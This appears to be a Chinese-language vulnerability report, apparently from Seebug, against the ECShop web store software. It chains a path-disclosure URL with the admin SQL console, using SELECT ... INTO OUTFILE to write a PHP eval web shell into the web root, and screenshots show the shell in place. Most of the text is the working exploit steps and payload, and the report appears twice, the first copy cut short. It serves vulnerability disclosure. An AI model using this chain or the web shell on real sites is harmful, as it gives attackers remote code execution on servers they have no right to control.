### 简要描述: 非模板 ### 详细说明: 爆路径+sql命令执行=getshell 0x01.爆路径,得到物理路径 ``` http://127.0.0.1/ecshop/languages/en_us/common.php ``` [<img src="https://images.seebug.org/upload/201305/291249512cab52a7902db11104118947238fe75f.jpg" alt="w01.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/291249512cab52a7902db11104118947238fe75f.jpg) 0x02.后台sql语句执行处,into outfile写文件,配合上步得到的物理路径拿shell 在sql语句处输入: ``` select "<?php @eval($_POST['c']);?>" into outfile '物理路径//test.php'; ``` [<img src="https://images.seebug.org/upload/201305/2912524761a3032f832eb6cd1cc667c01a4821b8.jpg" alt="w02.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/2912524761a3032f832eb6cd1cc667c01a4821b8.jpg) 0x03.提交执行,接下来,mysql报错了 [<img src="https://images.seebug.org/upload/201305/29125324844fbb35e9541dd3505142151c95b54e.jpg" alt="w03.jpg" width="600"...
### 简要描述: 非模板 ### 详细说明: 爆路径+sql命令执行=getshell 0x01.爆路径,得到物理路径 ``` http://127.0.0.1/ecshop/languages/en_us/common.php ``` [<img src="https://images.seebug.org/upload/201305/291249512cab52a7902db11104118947238fe75f.jpg" alt="w01.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/291249512cab52a7902db11104118947238fe75f.jpg) 0x02.后台sql语句执行处,into outfile写文件,配合上步得到的物理路径拿shell 在sql语句处输入: ``` select "<?php @eval($_POST['c']);?>" into outfile '物理路径//test.php'; ``` [<img src="https://images.seebug.org/upload/201305/2912524761a3032f832eb6cd1cc667c01a4821b8.jpg" alt="w02.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/2912524761a3032f832eb6cd1cc667c01a4821b8.jpg) 0x03.提交执行,接下来,mysql报错了 [<img src="https://images.seebug.org/upload/201305/29125324844fbb35e9541dd3505142151c95b54e.jpg" alt="w03.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/29125324844fbb35e9541dd3505142151c95b54e.jpg) 0x04.再去看看,可爱的shell已经在那里了 [<img src="https://images.seebug.org/upload/201305/291254004ba2c082864e3ed05d8b008176123e86.jpg" alt="w04.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/291254004ba2c082864e3ed05d8b008176123e86.jpg) ### 漏洞证明: [<img src="https://images.seebug.org/upload/201305/291255493f34cd6ab97ee03312acfd1bba70c66c.jpg" alt="w04.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/291255493f34cd6ab97ee03312acfd1bba70c66c.jpg)